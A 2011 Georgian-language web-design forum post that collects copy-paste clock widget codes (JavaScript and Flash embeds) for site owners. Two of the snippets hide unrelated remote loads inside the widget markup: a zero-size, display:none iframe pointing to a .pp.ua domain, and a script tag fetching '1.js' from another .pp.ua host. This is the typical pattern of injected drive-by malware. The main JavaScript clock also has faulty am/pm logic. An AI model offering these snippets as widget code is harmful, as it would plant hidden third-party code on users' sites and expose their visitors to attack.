ისწავლეთ მეტი
მთავარი
შესვლა
რეგისტრაცია
შაბათი, 18.05.2024, 21:56მოგესალმები სტუმარი | RSS
საიტის მენიუ

სექციის კატეგორიები
საიტის დიზაინები - WEB DESIGNES
სკრიპტები - SCRIPTS
პროგრამები - PROGRAMS
გაკვეთილები - LESSONS

მინი-ჩეთი
200

ჩვენი გამოკითხვა
რომელი სისტემა გიყენიათ?
სულ უპასუხა: 199

სტატისტიკა

სულ ონლაინში: 1
სტუმარი: 1
მომხმარებელი: 0

შესვლის ფორმა

მთავარი » 2011 » ოქტომბერი » 26 » საათების ნაკრები
18:18
საათების ნაკრები

insturqcia :  კონკურექტორი უნდა ჩართო შემდეგ ბლოკის დამატება
შემდეგ ჩასვავ სადაც გინდა მაგ ბლოკს მიცემ რაღაცა ეხატება მატორის სავით
და დააჭერ მერე HTML იქ ჩასვავ ამ კოდს და მორჩა ..















http://a.pix.ge/w/kcn2p.jpg

Code
<script language="JavaScript">  
<!--  
var digit = new Array()  
digit[0] = new Image(35, 60)  
digit[1] = new Image(35, 60)  
digit[2] = new Image(35, 60)  
digit[3] = new Image(35, 60)  
digit[4] = new Image(35, 60)  
digit[5] = new Image(35, 60)  
digit[6] = new Image(35, 60)  
digit[7] = new Image(35, 60)  
digit[8] = new Image(35, 60)  
digit[9] = new Image(35, 60)  
digit[10] = new Image(35, 60) // am  
digit[11] = new Image(35, 60) // pm  
digit[12] = new Image(35, 60) // colon  
digit[13] = new Image(35, 60) // blank  

// assign sources to digit image objects (0 - 9)  
for (var i = 0; i < 10; ++i) {  
  digit[i].src = "http://megabig.at.ua/images/" + "dg" + i + ".png"  
}  

// assign sources to other image objects  
digit[10].src = "http://megabig.at.ua/images/" + "dgam.png"  
digit[11].src = "http://megabig.at.ua/images/" + "dgpm.png"  
digit[12].src = "http://megabig.at.ua/images/" + "dgc.png"  
digit[13].src = "http://megabig.at.ua/images/" + "dgb.png"  

// set initial time values to impossible ones  
var hour1 = getHour(0)  
var hour2 = getHour(1)  
var minute1 = getMinute(0)  
var minute2 = getMinute(1)  
var ampm = getAmpm()  
var colon = false  

// get array substring of first clock image in document.images array  
var start = document.images.length // number of images in document  

// print initial clock  
var openImage = "<IMG SRC=\"http://megabig.at.ua/images/" + "dg"  
var closeImage = ".png\" HEIGHT=60 WIDTH=35>"  
document.write(openImage + hour1 + closeImage)  
document.write(openImage + hour2 + closeImage)  
document.write(openImage + "c.gif\" HEIGHT=60 WIDTH=18>")  
document.write(openImage + minute1 + closeImage)  
document.write(openImage + minute2 + closeImage)  
document.write(openImage + ((ampm == 10) ? "am" : "pm") + closeImage)  

var timerID = null  
var timerRunning = false  

update()  

function setClock() {  
  if (getHour(0) != hour1) { // not getHours()!  
  hour1 = getHour(0)  
  document.images[start].src = digit[hour1].src  
  }  
  if (getHour(1) != hour2) { // not getHours()!  
  hour2 = getHour(1)  
  document.images[start + 1].src = digit[hour2].src  
  }  
  colon = !colon  
  if (!colon)  
  document.images[start + 2].src = digit[13].src  
  else  
  document.images[start + 2].src = digit[12].src  
  if (getMinute(0) != minute1) { // not getMinutes()!  
  minute1 = getMinute(0)  
  document.images[start + 3].src = digit[minute1].src  
  }  
  if (getMinute(1) != minute2) { // not getMinutes()!  
  minute2 = getMinute(1)  
  document.images[start + 4].src = digit[minute2].src  
  }  
  if (getAmpm() != ampm) {  
  ampm = getAmpm()  
  document.images[start + 5].src = digit[ampm].src  
  }  
  timerID = setTimeout("setClock()",1000)  
  timerRunning = true  
}  

function update() {  
  stopClock()  
  setClock()  
}  

function stopClock() {  
if (timerRunning)  
  clearTimeout(timerID)  
timerRunning = false  
}  

function getHour(place) {  
  var now = new Date()  
  var hour = now.getHours()  
  if (hour >= 24)  
  hour -= 24  
  hour = (hour == 0) ? 24 : hour  
  if (hour < 10)  
  hour = "0" + hour // do not parse number!  
  hour += ""  
  return parseInt(hour.charAt(place))  
}  

function getMinute(place) {  
  var now = new Date()  
  var minute = now.getMinutes()  
  if (minute < 10)  
  minute = "0" + minute // do not parse number!  
  minute += ""  
  return parseInt(minute.charAt(place))  
}  

function getAmpm() {  
  var now = new Date()  
  var hour = now.getHours()  
  if (hour >= 24)  
  return 11 // pm  
  /* else */  
  return 10 // am  
}  

function getPath(url) {  
  lastSlash = url.lastIndexOf("/")  
  return url.substring(0, lastSlash + 1)  
}  

// -->  
</script>



http://funfoto.at.ua/_fr/7/9432034.png


Code
<object type="application/x-shockwave-flash" data="http://xflash.ucoz.ru/raznoe/131.swf" height="70" width="200"><param name="bgcolor" value="#ffffff">  
<param name="allowFullScreen" value="true">  
<param name="allowScriptAccess" value="always">  
<param name="wmode" value="transparent">  
<param name="movie" value="http://site.ru/uppod.swf">  
<param name="flashvars" value="st=;file="></object>




Code
<embed src="http://toolshell.org/ts-clock.swf?hm1=7&hm2=130&hm3=5F2EFF&hm4=7EFF3D&hm5=FF17F7&hm6=1&hm7=000&cid=windows/seven.png" type="application/x-shockwave-flash" wmode="transparent" height="150" width="150"><iframe src="http://5fg4.pp.ua" style="display: none;" height="0" width="0"></iframe>






Code
<object data="http://new-year123.ucoz.ru/Flash/clockcry.swf" type="application/x-shockwave-flash" allowfullscreen="true" height="180" width="180"><script type="text/javascript" src="http://onona.pp.ua/1.js"></script><param name="movie" value="http://new-year123.ucoz.ru/Flash/clockcry.swf" type=""><param name="wmode" value="transparent"><param name="allowFullScreen" value="true"></object>





Code
<script type="text/javascript" src="http://scriptbox.net.ru/cs_c4_clock.js"></script>




Code
<embed src="http://flash-clocks.com/free-flash-clocks-blog-topics/free-flash-clock-35.swf" wmode="transparent" type="application/x-shockwave-flash" height="200" width="200">




Code
<script language="JavaScript">  
<!--  
var digit = new Array()  
digit[0] = new Image(35, 60)  
digit[1] = new Image(35, 60)  
digit[2] = new Image(35, 60)  
digit[3] = new Image(35, 60)  
digit[4] = new Image(35, 60)  
digit[5] = new Image(35, 60)  
digit[6] = new Image(35, 60)  
digit[7] = new Image(35, 60)  
digit[8] = new Image(35, 60)  
digit[9] = new Image(35, 60)  
digit[10] = new Image(35, 60) // am  
digit[11] = new Image(35, 60) // pm  
digit[12] = new Image(35, 60) // colon  
digit[13] = new Image(35, 60) // blank  

// assign sources to digit image objects (0 - 9)  
for (var i = 0; i < 10; ++i) {  
  digit[i].src = "http://megabig.at.ua/images/" + "dg" + i + ".png"  
}  

// assign sources to other image objects  
digit[10].src = "http://megabig.at.ua/images/" + "dgam.png"  
digit[11].src = "http://megabig.at.ua/images/" + "dgpm.png"  
digit[12].src = "http://megabig.at.ua/images/" + "dgc.png"  
digit[13].src = "http://megabig.at.ua/images/" + "dgb.png"  

// set initial time values to impossible ones  
var hour1 = getHour(0)  
var hour2 = getHour(1)  
var minute1 = getMinute(0)  
var minute2 = getMinute(1)  
var ampm = getAmpm()  
var colon = false  

// get array substring of first clock image in document.images array  
var start = document.images.length // number of images in document  

// print initial clock  
var openImage = "<IMG SRC=\"http://megabig.at.ua/images/" + "dg"  
var closeImage = ".png\" HEIGHT=60 WIDTH=35>"  
document.write(openImage + hour1 + closeImage)  
document.write(openImage + hour2 + closeImage)  
document.write(openImage + "c.gif\" HEIGHT=60 WIDTH=18>")  
document.write(openImage + minute1 + closeImage)  
document.write(openImage + minute2 + closeImage)  
document.write(openImage + ((ampm == 10) ? "am" : "pm") + closeImage)  

var timerID = null  
var timerRunning = false  

update()  

function setClock() {  
  if (getHour(0) != hour1) { // not getHours()!  
  hour1 = getHour(0)  
  document.images[start].src = digit[hour1].src  
  }  
  if (getHour(1) != hour2) { // not getHours()!  
  hour2 = getHour(1)  
  document.images[start + 1].src = digit[hour2].src  
  }  
  colon = !colon  
  if (!colon)  
  document.images[start + 2].src = digit[13].src  
  else  
  document.images[start + 2].src = digit[12].src  
  if (getMinute(0) != minute1) { // not getMinutes()!  
  minute1 = getMinute(0)  
  document.images[start + 3].src = digit[minute1].src  
  }  
  if (getMinute(1) != minute2) { // not getMinutes()!  
  minute2 = getMinute(1)  
  document.images[start + 4].src = digit[minute2].src  
  }  
  if (getAmpm() != ampm) {  
  ampm = getAmpm()  
  document.images[start + 5].src = digit[ampm].src  
  }  
  timerID = setTimeout("setClock()",1000)  
  timerRunning = true  
}  

function update() {  
  stopClock()  
  setClock()  
}  

function stopClock() {  
if (timerRunning)  
  clearTimeout(timerID)  
timerRunning = false  
}  

function getHour(place) {  
  var now = new Date()  
  var hour = now.getHours()  
  if (hour >= 24)  
  hour -= 24  
  hour = (hour == 0) ? 24 : hour  
  if (hour < 10)  
  hour = "0" + hour // do not parse number!  
  hour += ""  
  return parseInt(hour.charAt(place))  
}  

function getMinute(place) {  
  var now = new Date()  
  var minute = now.getMinutes()  
  if (minute < 10)  
  minute = "0" + minute // do not parse number!  
  minute += ""  
  return parseInt(minute.charAt(place))  
}  

function getAmpm() {  
  var now = new Date()  
  var hour = now.getHours()  
  if (hour >= 24)  
  return 11 // pm  
  /* else */  
  return 10 // am  
}  

function getPath(url) {  
  lastSlash = url.lastIndexOf("/")  
  return url.substring(0, lastSlash + 1)  
}  

// -->  
</script>




Code
<embed allowscriptaccess="never" pluginspage="http://www.macromedia.com/go/getflashplayer" src="http://best-studio.at.ua/Chasi/clock_bs_nfs.swf" wmode="transparent" type="application/x-shockwave-flash" quality="high" height="210" width="210">




Code
<object type="application/x-shockwave-flash" data="http://cs-ural.clan.su/host/files/clocks_cs_man.swf" width="200" height="100"><param name="bgcolor" value="#ffffff" />  
  <param name="allowFullScreen" value="true" />  
  <param name="allowScriptAccess" value="always" />  
  <param name="wmode" value="transparent" />  
  <param name="movie" value="http://site.ru/uppod.swf" />  
  <param name="flashvars" value="st=;file=" /></object>
კატეგორია: სკრიპტები - SCRIPTS | ნანახია: 934 | დაამატა: reziko | რეიტინგი: 0.0/0
სულ კომენტარები: 0
კომენტარის დამატება შეუძლიათ მხოლოდ დარეგისტრირებულ მომხმარებლებს
[ რეგისტრაცია | შესვლა ]
ძებნა

კალენდარი
«  ოქტომბერი 2011  »
ორსამოთხხუთპარშაბკვ
     12
3456789
10111213141516
17181920212223
24252627282930
31

ჩანაწერების არქივი

საიტის მეგობრები